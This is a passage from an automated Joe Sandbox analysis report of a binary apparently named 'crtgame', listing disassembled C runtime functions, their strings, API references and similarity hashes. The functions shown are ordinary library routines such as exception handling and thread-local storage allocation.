                                                                                              • Part of subcall function 02A31410: std::exception::exception.LIBCMT ref: 02A31428
                                                                                            Strings
                                                                                            • Month number is out of range 1..12, xrefs: 02A3392C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                            • String ID: Month number is out of range 1..12
                                                                                            • API String ID: 2067857976-4198407886
                                                                                            • Opcode ID: 596e86758b70cf11acae967fb6fb89fb9c361957f2f14e5870ea4a90709db3ac
                                                                                            • Instruction ID: a94be7b637f4a8cf5514e899b29fee19eaa077ede23779c316866b711680346d
                                                                                            • Opcode Fuzzy Hash: 596e86758b70cf11acae967fb6fb89fb9c361957f2f14e5870ea4a90709db3ac
                                                                                            • Instruction Fuzzy Hash: C7E0D8B2E802246BE715FF9489117DFB775EF08710F00009AFC0163280DFB51984CB91
                                                                                            APIs
                                                                                            • TlsAlloc.KERNEL32 ref: 02A319CC
                                                                                            • GetLastError.KERNEL32 ref: 02A319D9
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocErrorH_prologLast
                                                                                            • String ID: tss
                                                                                            • API String ID: 249634027-1638339373
                                                                                            • Opcode ID: 4606aec9070e3b69327255ef82d8595e99b04575d30b4c6c04215353431dd271
                                                                                            • Instruction ID: baf5c6cd528921e0513deefad78740fb593aec9ad1955cbe2e7007410944f5f3
                                                                                            • Opcode Fuzzy Hash: 4606aec9070e3b69327255ef82d8595e99b04575d30b4c6c04215353431dd271
                                                                                            • Instruction Fuzzy Hash: 5DE08C32D443245BC2007B78AC0808BBBE49A84335F108B6AFDAE972D0FF30C9558BC6
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A33BD8
                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 02A33BED
                                                                                              • Part of subcall function 02A41EB7: std::exception::exception.LIBCMT ref: 02A41EC1
                                                                                              • Part of subcall function 02A39FE0: __EH_prolog.LIBCMT ref: 02A39FE5
                                                                                              • Part of subcall function 02A39FE0: __CxxThrowException@8.LIBCMT ref: 02A3A00E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                            • String ID: bad cast
                                                                                            • API String ID: 1300498068-3145022300
                                                                                            • Opcode ID: 11ae6335e6a6753ec99ed1ea19a2b62feaeef3a053e2171f27e5f1134118cf2e
                                                                                            • Instruction ID: 75af33dc7ffd9c77c39ebe288260ae8946b00dd1b08dc9b98e11a0e8e1142efc
                                                                                            • Opcode Fuzzy Hash: 11ae6335e6a6753ec99ed1ea19a2b62feaeef3a053e2171f27e5f1134118cf2e
                                                                                            • Instruction Fuzzy Hash: 7FE0DF71D40109EBC715EF54D241BBEB771EF14304F0040ADAC0647690CF304A86CF81